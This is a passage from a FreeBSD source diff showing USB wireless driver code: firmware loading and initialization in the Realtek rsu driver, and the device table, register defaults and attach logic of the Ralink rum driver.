fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 10; ntries++) { usb_pause_mtx(&sc->sc_mtx, 10); reg = rsu_read_2(sc, R92S_TCR); if (reg & R92S_TCR_EMEM_CODE_DONE) break; } if (ntries == 10 || !(reg & R92S_TCR_EMEM_CHK_RPT)) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "EMEM"); error = ETIMEDOUT; goto fail; } /* Enable CPU. 
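 * IMEM and EMEM are in place; select the CPU clock and set
 * R92S_FEN_CPUEN so the on-chip microcontroller starts running, then
 * wait for it to report IMEM_RDY before the DMEM configuration block
 * is pushed.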
*/ rsu_write_1(sc, R92S_SYS_CLKR, rsu_read_1(sc, R92S_SYS_CLKR) | R92S_SYS_CPU_CLKSEL); if (!(rsu_read_1(sc, R92S_SYS_CLKR) & R92S_SYS_CPU_CLKSEL)) { device_printf(sc->sc_dev, "could not enable system clock\n"); error = EIO; goto fail; } rsu_write_2(sc, R92S_SYS_FUNC_EN, rsu_read_2(sc, R92S_SYS_FUNC_EN) | R92S_FEN_CPUEN); if (!(rsu_read_2(sc, R92S_SYS_FUNC_EN) & R92S_FEN_CPUEN)) { device_printf(sc->sc_dev, "could not enable microcontroller\n"); error = EIO; goto fail; } /* Wait for CPU to initialize. */ for (ntries = 0; ntries < 100; ntries++) { if (rsu_read_2(sc, R92S_TCR) & R92S_TCR_IMEM_RDY) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for microcontroller\n"); error = ETIMEDOUT; goto fail; } /* Update DMEM section before loading. */ dmem = __DECONST(struct r92s_fw_priv *, &hdr->priv); memset(dmem, 0, sizeof(*dmem)); dmem->hci_sel = R92S_HCI_SEL_USB | R92S_HCI_SEL_8172; dmem->nendpoints = sc->npipes; dmem->rf_config = 0x12; /* 1T2R */ dmem->vcs_type = R92S_VCS_TYPE_AUTO; dmem->vcs_mode = R92S_VCS_MODE_RTS_CTS; #ifdef notyet dmem->bw40_en = (ic->ic_htcaps & IEEE80211_HTCAP_CBW20_40) != 0; #endif dmem->turbo_mode = 1; /* Load DMEM section. */ error = rsu_fw_loadsection(sc, (uint8_t *)dmem, sizeof(*dmem)); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware section %s\n", "DMEM"); goto fail; } /* Wait for load to complete. */ for (ntries = 0; ntries < 100; ntries++) { if (rsu_read_2(sc, R92S_TCR) & R92S_TCR_DMEM_CODE_DONE) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for %s transfer\n", "DMEM"); error = ETIMEDOUT; goto fail; } /* Wait for firmware readiness. */ for (ntries = 0; ntries < 60; ntries++) { if (!(rsu_read_2(sc, R92S_TCR) & R92S_TCR_FWRDY)) break; DELAY(1000); } if (ntries == 60) { device_printf(sc->sc_dev, "timeout waiting for firmware readiness\n"); error = ETIMEDOUT; goto fail; } fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int rsu_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct rsu_softc *sc = ifp->if_softc; struct rsu_data *bf; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } RSU_LOCK(sc); bf = rsu_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); RSU_UNLOCK(sc); return (ENOBUFS); } ifp->if_opackets++; if (rsu_tx_start(sc, ni, m, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); RSU_UNLOCK(sc); return (EIO); } RSU_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void rsu_init(void *arg) { struct rsu_softc *sc = arg; RSU_LOCK(sc); rsu_init_locked(arg); RSU_UNLOCK(sc); } static void rsu_init_locked(struct rsu_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct r92s_set_pwr_mode cmd; int error; /* Init host async commands ring. */ sc->cmdq.cur = sc->cmdq.next = sc->cmdq.queued = 0; /* Allocate Tx/Rx buffers. */ error = rsu_alloc_rx_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx buffers\n"); return; } error = rsu_alloc_tx_list(sc); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx buffers\n"); rsu_free_rx_list(sc); return; } /* Power on adapter. */ if (sc->cut == 1) rsu_power_on_acut(sc); else rsu_power_on_bcut(sc); /* Load firmware. 
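 * rsu_load_firmware() uploads the IMEM/EMEM images and the DMEM
 * configuration block; the firmware still needs about 1.5 s to boot
 * (see the pause further down) before it will accept commands.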
*/ error = rsu_load_firmware(sc); if (error != 0) goto fail; /* Enable Rx TCP checksum offload. */ rsu_write_4(sc, R92S_RCR, rsu_read_4(sc, R92S_RCR) | 0x04000000); /* Append PHY status. */ rsu_write_4(sc, R92S_RCR, rsu_read_4(sc, R92S_RCR) | 0x02000000); rsu_write_4(sc, R92S_CR, rsu_read_4(sc, R92S_CR) & ~0xff000000); /* Use 128 bytes pages. */ rsu_write_1(sc, 0x00b5, rsu_read_1(sc, 0x00b5) | 0x01); /* Enable USB Rx aggregation. */ rsu_write_1(sc, 0x00bd, rsu_read_1(sc, 0x00bd) | 0x80); /* Set USB Rx aggregation threshold. */ rsu_write_1(sc, 0x00d9, 0x01); /* Set USB Rx aggregation timeout (1.7ms/4). */ rsu_write_1(sc, 0xfe5b, 0x04); /* Fix USB Rx FIFO issue. */ rsu_write_1(sc, 0xfe5c, rsu_read_1(sc, 0xfe5c) | 0x80); /* Set MAC address. */ rsu_write_region_1(sc, R92S_MACID, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* NB: it really takes that long for firmware to boot. */ usb_pause_mtx(&sc->sc_mtx, 1500); DPRINTF("setting MAC address to %s\n", ether_sprintf(IF_LLADDR(ifp))); error = rsu_fw_cmd(sc, R92S_CMD_SET_MAC_ADDRESS, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); if (error != 0) { device_printf(sc->sc_dev, "could not set MAC address\n"); goto fail; } rsu_write_1(sc, R92S_USB_HRPWM, R92S_USB_HRPWM_PS_ST_ACTIVE | R92S_USB_HRPWM_PS_ALL_ON); memset(&cmd, 0, sizeof(cmd)); cmd.mode = R92S_PS_MODE_ACTIVE; DPRINTF("setting ps mode to %d\n", cmd.mode); error = rsu_fw_cmd(sc, R92S_CMD_SET_PWR_MODE, &cmd, sizeof(cmd)); if (error != 0) { device_printf(sc->sc_dev, "could not set PS mode\n"); goto fail; } #if 0 if (ic->ic_htcaps & IEEE80211_HTCAP_CBW20_40) { /* Enable 40MHz mode. */ error = rsu_fw_iocmd(sc, SM(R92S_IOCMD_CLASS, 0xf4) | SM(R92S_IOCMD_INDEX, 0x00) | SM(R92S_IOCMD_VALUE, 0x0007)); if (error != 0) { device_printf(sc->sc_dev, "could not enable 40MHz mode\n"); goto fail; } } /* Set default channel. */ ic->ic_bss->ni_chan = ic->ic_ibss_chan; #endif sc->scan_pass = 0; usbd_transfer_start(sc->sc_xfer[RSU_BULK_RX]); /* We're ready to go. */ ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, rsu_watchdog, sc); return; fail: rsu_free_rx_list(sc); rsu_free_tx_list(sc); return; } static void rsu_stop(struct ifnet *ifp, int disable) { struct rsu_softc *sc = ifp->if_softc; RSU_LOCK(sc); rsu_stop_locked(ifp, disable); RSU_UNLOCK(sc); } static void rsu_stop_locked(struct ifnet *ifp, int disable __unused) { struct rsu_softc *sc = ifp->if_softc; int i; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); callout_stop(&sc->sc_watchdog_ch); sc->sc_calibrating = 0; taskqueue_cancel_timeout(taskqueue_thread, &sc->calib_task, NULL); /* Power off adapter. */ rsu_power_off(sc); for (i = 0; i < RSU_N_TRANSFER; i++) usbd_transfer_stop(sc->sc_xfer[i]); } diff --git a/sys/dev/usb/wlan/if_rum.c b/sys/dev/usb/wlan/if_rum.c index e05dda07711d..1b45c35a4e17 100644 --- a/sys/dev/usb/wlan/if_rum.c +++ b/sys/dev/usb/wlan/if_rum.c @@ -1,2400 +1,2400 @@ /* $FreeBSD$ */ /*- * Copyright (c) 2005-2007 Damien Bergamini * Copyright (c) 2006 Niall O'Higgins * Copyright (c) 2007-2008 Hans Petter Selasky * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /*- * Ralink Technology RT2501USB/RT2601USB chipset driver * http://www.ralinktech.com.tw/ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR rum_debug #include #include #include #include #ifdef USB_DEBUG static int rum_debug = 0; static SYSCTL_NODE(_hw_usb, OID_AUTO, rum, CTLFLAG_RW, 0, "USB rum"); SYSCTL_INT(_hw_usb_rum, OID_AUTO, debug, CTLFLAG_RW, &rum_debug, 0, "Debug level"); #endif #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) static const STRUCT_USB_HOST_ID rum_devs[] = { #define RUM_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } RUM_DEV(ABOCOM, HWU54DM), RUM_DEV(ABOCOM, RT2573_2), RUM_DEV(ABOCOM, RT2573_3), RUM_DEV(ABOCOM, RT2573_4), RUM_DEV(ABOCOM, WUG2700), RUM_DEV(AMIT, CGWLUSB2GO), RUM_DEV(ASUS, RT2573_1), RUM_DEV(ASUS, RT2573_2), RUM_DEV(BELKIN, F5D7050A), RUM_DEV(BELKIN, F5D9050V3), RUM_DEV(CISCOLINKSYS, WUSB54GC), RUM_DEV(CISCOLINKSYS, WUSB54GR), RUM_DEV(CONCEPTRONIC2, C54RU2), RUM_DEV(COREGA, CGWLUSB2GL), RUM_DEV(COREGA, CGWLUSB2GPX), RUM_DEV(DICKSMITH, CWD854F), RUM_DEV(DICKSMITH, RT2573), RUM_DEV(EDIMAX, EW7318USG), RUM_DEV(DLINK2, DWLG122C1), RUM_DEV(DLINK2, WUA1340), RUM_DEV(DLINK2, DWA111), RUM_DEV(DLINK2, DWA110), RUM_DEV(GIGABYTE, GNWB01GS), RUM_DEV(GIGABYTE, GNWI05GS), RUM_DEV(GIGASET, RT2573), RUM_DEV(GOODWAY, RT2573), RUM_DEV(GUILLEMOT, HWGUSB254LB), RUM_DEV(GUILLEMOT, HWGUSB254V2AP), RUM_DEV(HUAWEI3COM, WUB320G), RUM_DEV(MELCO, G54HP), RUM_DEV(MELCO, SG54HP), RUM_DEV(MELCO, SG54HG), RUM_DEV(MELCO, WLIUCG), RUM_DEV(MELCO, WLRUCG), RUM_DEV(MELCO, WLRUCGAOSS), RUM_DEV(MSI, RT2573_1), RUM_DEV(MSI, RT2573_2), RUM_DEV(MSI, RT2573_3), RUM_DEV(MSI, RT2573_4), RUM_DEV(NOVATECH, RT2573), RUM_DEV(PLANEX2, GWUS54HP), RUM_DEV(PLANEX2, GWUS54MINI2), RUM_DEV(PLANEX2, GWUSMM), RUM_DEV(QCOM, RT2573), RUM_DEV(QCOM, RT2573_2), RUM_DEV(QCOM, RT2573_3), RUM_DEV(RALINK, RT2573), RUM_DEV(RALINK, RT2573_2), RUM_DEV(RALINK, RT2671), RUM_DEV(SITECOMEU, WL113R2), RUM_DEV(SITECOMEU, WL172), RUM_DEV(SPARKLAN, RT2573), RUM_DEV(SURECOM, RT2573), #undef RUM_DEV }; static device_probe_t rum_match; static device_attach_t rum_attach; static device_detach_t rum_detach; static usb_callback_t rum_bulk_read_callback; static usb_callback_t rum_bulk_write_callback; static usb_error_t rum_do_request(struct rum_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *rum_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void rum_vap_delete(struct ieee80211vap *); static void rum_tx_free(struct rum_tx_data *, int); static void rum_setup_tx_list(struct rum_softc *); static void rum_unsetup_tx_list(struct rum_softc *); static int rum_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void rum_setup_tx_desc(struct rum_softc *, struct rum_tx_desc 
*, uint32_t, uint16_t, int, int); static int rum_tx_mgt(struct rum_softc *, struct mbuf *, struct ieee80211_node *); static int rum_tx_raw(struct rum_softc *, struct mbuf *, struct ieee80211_node *, const struct ieee80211_bpf_params *); static int rum_tx_data(struct rum_softc *, struct mbuf *, struct ieee80211_node *); static void rum_start(struct ifnet *); static int rum_ioctl(struct ifnet *, u_long, caddr_t); static void rum_eeprom_read(struct rum_softc *, uint16_t, void *, int); static uint32_t rum_read(struct rum_softc *, uint16_t); static void rum_read_multi(struct rum_softc *, uint16_t, void *, int); static usb_error_t rum_write(struct rum_softc *, uint16_t, uint32_t); static usb_error_t rum_write_multi(struct rum_softc *, uint16_t, void *, size_t); static void rum_bbp_write(struct rum_softc *, uint8_t, uint8_t); static uint8_t rum_bbp_read(struct rum_softc *, uint8_t); static void rum_rf_write(struct rum_softc *, uint8_t, uint32_t); static void rum_select_antenna(struct rum_softc *); static void rum_enable_mrr(struct rum_softc *); static void rum_set_txpreamble(struct rum_softc *); static void rum_set_basicrates(struct rum_softc *); static void rum_select_band(struct rum_softc *, struct ieee80211_channel *); static void rum_set_chan(struct rum_softc *, struct ieee80211_channel *); static void rum_enable_tsf_sync(struct rum_softc *); static void rum_enable_tsf(struct rum_softc *); static void rum_update_slot(struct ifnet *); static void rum_set_bssid(struct rum_softc *, const uint8_t *); static void rum_set_macaddr(struct rum_softc *, const uint8_t *); static void rum_update_mcast(struct ifnet *); static void rum_update_promisc(struct ifnet *); static void rum_setpromisc(struct rum_softc *); static const char *rum_get_rf(int); static void rum_read_eeprom(struct rum_softc *); static int rum_bbp_init(struct rum_softc *); static void rum_init_locked(struct rum_softc *); static void rum_init(void *); static void rum_stop(struct rum_softc *); static void rum_load_microcode(struct rum_softc *, const uint8_t *, size_t); static void rum_prepare_beacon(struct rum_softc *, struct ieee80211vap *); static int rum_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void rum_scan_start(struct ieee80211com *); static void rum_scan_end(struct ieee80211com *); static void rum_set_channel(struct ieee80211com *); static int rum_get_rssi(struct rum_softc *, uint8_t); static void rum_ratectl_start(struct rum_softc *, struct ieee80211_node *); static void rum_ratectl_timeout(void *); static void rum_ratectl_task(void *, int); static int rum_pause(struct rum_softc *, int); static const struct { uint32_t reg; uint32_t val; } rum_def_mac[] = { { RT2573_TXRX_CSR0, 0x025fb032 }, { RT2573_TXRX_CSR1, 0x9eaa9eaf }, { RT2573_TXRX_CSR2, 0x8a8b8c8d }, { RT2573_TXRX_CSR3, 0x00858687 }, { RT2573_TXRX_CSR7, 0x2e31353b }, { RT2573_TXRX_CSR8, 0x2a2a2a2c }, { RT2573_TXRX_CSR15, 0x0000000f }, { RT2573_MAC_CSR6, 0x00000fff }, { RT2573_MAC_CSR8, 0x016c030a }, { RT2573_MAC_CSR10, 0x00000718 }, { RT2573_MAC_CSR12, 0x00000004 }, { RT2573_MAC_CSR13, 0x00007f00 }, { RT2573_SEC_CSR0, 0x00000000 }, { RT2573_SEC_CSR1, 0x00000000 }, { RT2573_SEC_CSR5, 0x00000000 }, { RT2573_PHY_CSR1, 0x000023b0 }, { RT2573_PHY_CSR5, 0x00040a06 }, { RT2573_PHY_CSR6, 0x00080606 }, { RT2573_PHY_CSR7, 0x00000408 }, { RT2573_AIFSN_CSR, 0x00002273 }, { RT2573_CWMIN_CSR, 0x00002344 }, { RT2573_CWMAX_CSR, 0x000034aa } }; static const struct { uint8_t reg; uint8_t val; } rum_def_bbp[] = { { 3, 0x80 }, { 15, 0x30 }, { 
17, 0x20 }, { 21, 0xc8 }, { 22, 0x38 }, { 23, 0x06 }, { 24, 0xfe }, { 25, 0x0a }, { 26, 0x0d }, { 32, 0x0b }, { 34, 0x12 }, { 37, 0x07 }, { 39, 0xf8 }, { 41, 0x60 }, { 53, 0x10 }, { 54, 0x18 }, { 60, 0x10 }, { 61, 0x04 }, { 62, 0x04 }, { 75, 0xfe }, { 86, 0xfe }, { 88, 0xfe }, { 90, 0x0f }, { 99, 0x00 }, { 102, 0x16 }, { 107, 0x04 } }; static const struct rfprog { uint8_t chan; uint32_t r1, r2, r3, r4; } rum_rf5226[] = { { 1, 0x00b03, 0x001e1, 0x1a014, 0x30282 }, { 2, 0x00b03, 0x001e1, 0x1a014, 0x30287 }, { 3, 0x00b03, 0x001e2, 0x1a014, 0x30282 }, { 4, 0x00b03, 0x001e2, 0x1a014, 0x30287 }, { 5, 0x00b03, 0x001e3, 0x1a014, 0x30282 }, { 6, 0x00b03, 0x001e3, 0x1a014, 0x30287 }, { 7, 0x00b03, 0x001e4, 0x1a014, 0x30282 }, { 8, 0x00b03, 0x001e4, 0x1a014, 0x30287 }, { 9, 0x00b03, 0x001e5, 0x1a014, 0x30282 }, { 10, 0x00b03, 0x001e5, 0x1a014, 0x30287 }, { 11, 0x00b03, 0x001e6, 0x1a014, 0x30282 }, { 12, 0x00b03, 0x001e6, 0x1a014, 0x30287 }, { 13, 0x00b03, 0x001e7, 0x1a014, 0x30282 }, { 14, 0x00b03, 0x001e8, 0x1a014, 0x30284 }, { 34, 0x00b03, 0x20266, 0x36014, 0x30282 }, { 38, 0x00b03, 0x20267, 0x36014, 0x30284 }, { 42, 0x00b03, 0x20268, 0x36014, 0x30286 }, { 46, 0x00b03, 0x20269, 0x36014, 0x30288 }, { 36, 0x00b03, 0x00266, 0x26014, 0x30288 }, { 40, 0x00b03, 0x00268, 0x26014, 0x30280 }, { 44, 0x00b03, 0x00269, 0x26014, 0x30282 }, { 48, 0x00b03, 0x0026a, 0x26014, 0x30284 }, { 52, 0x00b03, 0x0026b, 0x26014, 0x30286 }, { 56, 0x00b03, 0x0026c, 0x26014, 0x30288 }, { 60, 0x00b03, 0x0026e, 0x26014, 0x30280 }, { 64, 0x00b03, 0x0026f, 0x26014, 0x30282 }, { 100, 0x00b03, 0x0028a, 0x2e014, 0x30280 }, { 104, 0x00b03, 0x0028b, 0x2e014, 0x30282 }, { 108, 0x00b03, 0x0028c, 0x2e014, 0x30284 }, { 112, 0x00b03, 0x0028d, 0x2e014, 0x30286 }, { 116, 0x00b03, 0x0028e, 0x2e014, 0x30288 }, { 120, 0x00b03, 0x002a0, 0x2e014, 0x30280 }, { 124, 0x00b03, 0x002a1, 0x2e014, 0x30282 }, { 128, 0x00b03, 0x002a2, 0x2e014, 0x30284 }, { 132, 0x00b03, 0x002a3, 0x2e014, 0x30286 }, { 136, 0x00b03, 0x002a4, 0x2e014, 0x30288 }, { 140, 0x00b03, 0x002a6, 0x2e014, 0x30280 }, { 149, 0x00b03, 0x002a8, 0x2e014, 0x30287 }, { 153, 0x00b03, 0x002a9, 0x2e014, 0x30289 }, { 157, 0x00b03, 0x002ab, 0x2e014, 0x30281 }, { 161, 0x00b03, 0x002ac, 0x2e014, 0x30283 }, { 165, 0x00b03, 0x002ad, 0x2e014, 0x30285 } }, rum_rf5225[] = { { 1, 0x00b33, 0x011e1, 0x1a014, 0x30282 }, { 2, 0x00b33, 0x011e1, 0x1a014, 0x30287 }, { 3, 0x00b33, 0x011e2, 0x1a014, 0x30282 }, { 4, 0x00b33, 0x011e2, 0x1a014, 0x30287 }, { 5, 0x00b33, 0x011e3, 0x1a014, 0x30282 }, { 6, 0x00b33, 0x011e3, 0x1a014, 0x30287 }, { 7, 0x00b33, 0x011e4, 0x1a014, 0x30282 }, { 8, 0x00b33, 0x011e4, 0x1a014, 0x30287 }, { 9, 0x00b33, 0x011e5, 0x1a014, 0x30282 }, { 10, 0x00b33, 0x011e5, 0x1a014, 0x30287 }, { 11, 0x00b33, 0x011e6, 0x1a014, 0x30282 }, { 12, 0x00b33, 0x011e6, 0x1a014, 0x30287 }, { 13, 0x00b33, 0x011e7, 0x1a014, 0x30282 }, { 14, 0x00b33, 0x011e8, 0x1a014, 0x30284 }, { 34, 0x00b33, 0x01266, 0x26014, 0x30282 }, { 38, 0x00b33, 0x01267, 0x26014, 0x30284 }, { 42, 0x00b33, 0x01268, 0x26014, 0x30286 }, { 46, 0x00b33, 0x01269, 0x26014, 0x30288 }, { 36, 0x00b33, 0x01266, 0x26014, 0x30288 }, { 40, 0x00b33, 0x01268, 0x26014, 0x30280 }, { 44, 0x00b33, 0x01269, 0x26014, 0x30282 }, { 48, 0x00b33, 0x0126a, 0x26014, 0x30284 }, { 52, 0x00b33, 0x0126b, 0x26014, 0x30286 }, { 56, 0x00b33, 0x0126c, 0x26014, 0x30288 }, { 60, 0x00b33, 0x0126e, 0x26014, 0x30280 }, { 64, 0x00b33, 0x0126f, 0x26014, 0x30282 }, { 100, 0x00b33, 0x0128a, 0x2e014, 0x30280 }, { 104, 0x00b33, 0x0128b, 0x2e014, 0x30282 }, { 108, 0x00b33, 0x0128c, 
0x2e014, 0x30284 }, { 112, 0x00b33, 0x0128d, 0x2e014, 0x30286 }, { 116, 0x00b33, 0x0128e, 0x2e014, 0x30288 }, { 120, 0x00b33, 0x012a0, 0x2e014, 0x30280 }, { 124, 0x00b33, 0x012a1, 0x2e014, 0x30282 }, { 128, 0x00b33, 0x012a2, 0x2e014, 0x30284 }, { 132, 0x00b33, 0x012a3, 0x2e014, 0x30286 }, { 136, 0x00b33, 0x012a4, 0x2e014, 0x30288 }, { 140, 0x00b33, 0x012a6, 0x2e014, 0x30280 }, { 149, 0x00b33, 0x012a8, 0x2e014, 0x30287 }, { 153, 0x00b33, 0x012a9, 0x2e014, 0x30289 }, { 157, 0x00b33, 0x012ab, 0x2e014, 0x30281 }, { 161, 0x00b33, 0x012ac, 0x2e014, 0x30283 }, { 165, 0x00b33, 0x012ad, 0x2e014, 0x30285 } }; static const struct usb_config rum_config[RUM_N_TRANSFER] = { [RUM_BULK_WR] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_OUT, .bufsize = (MCLBYTES + RT2573_TX_DESC_SIZE + 8), .flags = {.pipe_bof = 1,.force_short_xfer = 1,}, .callback = rum_bulk_write_callback, .timeout = 5000, /* ms */ }, [RUM_BULK_RD] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = (MCLBYTES + RT2573_RX_DESC_SIZE), .flags = {.pipe_bof = 1,.short_xfer_ok = 1,}, .callback = rum_bulk_read_callback, }, }; static int rum_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != 0) return (ENXIO); if (uaa->info.bIfaceIndex != RT2573_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(rum_devs, sizeof(rum_devs), uaa)); } static int rum_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct rum_softc *sc = device_get_softc(self); struct ieee80211com *ic; struct ifnet *ifp; uint8_t iface_index, bands; uint32_t tmp; int error, ntries; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); iface_index = RT2573_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, rum_config, RUM_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } RUM_LOCK(sc); /* retrieve RT2573 rev. 
no */ for (ntries = 0; ntries < 100; ntries++) { if ((tmp = rum_read(sc, RT2573_MAC_CSR0)) != 0) break; if (rum_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for chip to settle\n"); RUM_UNLOCK(sc); goto detach; } /* retrieve MAC address and various other things from EEPROM */ rum_read_eeprom(sc); device_printf(sc->sc_dev, "MAC/BBP RT2573 (rev 0x%05x), RF %s\n", tmp, rum_get_rf(sc->rf_rev)); rum_load_microcode(sc, rt2573_ucode, sizeof(rt2573_ucode)); RUM_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "rum", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rum_init; ifp->if_ioctl = rum_ioctl; ifp->if_start = rum_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_IBSS /* IBSS mode supported */ | IEEE80211_C_MONITOR /* monitor mode supported */ | IEEE80211_C_HOSTAP /* HostAp mode supported */ | IEEE80211_C_TXPMGT /* tx power management */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* bg scanning supported */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2573_RF_5225 || sc->rf_rev == RT2573_RF_5226) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_update_promisc = rum_update_promisc; ic->ic_raw_xmit = rum_raw_xmit; ic->ic_scan_start = rum_scan_start; ic->ic_scan_end = rum_scan_end; ic->ic_set_channel = rum_set_channel; ic->ic_vap_create = rum_vap_create; ic->ic_vap_delete = rum_vap_delete; ic->ic_update_mcast = rum_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2573_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2573_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: rum_detach(self); return (ENXIO); /* failure */ } static int rum_detach(device_t self) { struct rum_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic; /* Prevent further ioctls */ RUM_LOCK(sc); sc->sc_detached = 1; RUM_UNLOCK(sc); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, RUM_N_TRANSFER); /* free TX list, if any */ RUM_LOCK(sc); rum_unsetup_tx_list(sc); RUM_UNLOCK(sc); if (ifp) { ic = ifp->if_l2com; ieee80211_ifdetach(ic); if_free(ifp); } mtx_destroy(&sc->sc_mtx); return (0); } static usb_error_t rum_do_request(struct rum_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTFN(1, "Control request failed, %s (retrying)\n", usbd_errstr(err)); if (rum_pause(sc, hz / 100)) break; } return (err); } static struct ieee80211vap * rum_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct rum_softc *sc = 
ic->ic_ifp->if_softc; struct rum_vap *rvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; rvp = (struct rum_vap *) malloc(sizeof(struct rum_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(rvp, M_80211_VAP); return (NULL); } /* override state transition machine */ rvp->newstate = vap->iv_newstate; vap->iv_newstate = rum_newstate; usb_callout_init_mtx(&rvp->ratectl_ch, &sc->sc_mtx, 0); TASK_INIT(&rvp->ratectl_task, 0, rum_ratectl_task, rvp); ieee80211_ratectl_init(vap); ieee80211_ratectl_setinterval(vap, 1000 /* 1 sec */); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void rum_vap_delete(struct ieee80211vap *vap) { struct rum_vap *rvp = RUM_VAP(vap); struct ieee80211com *ic = 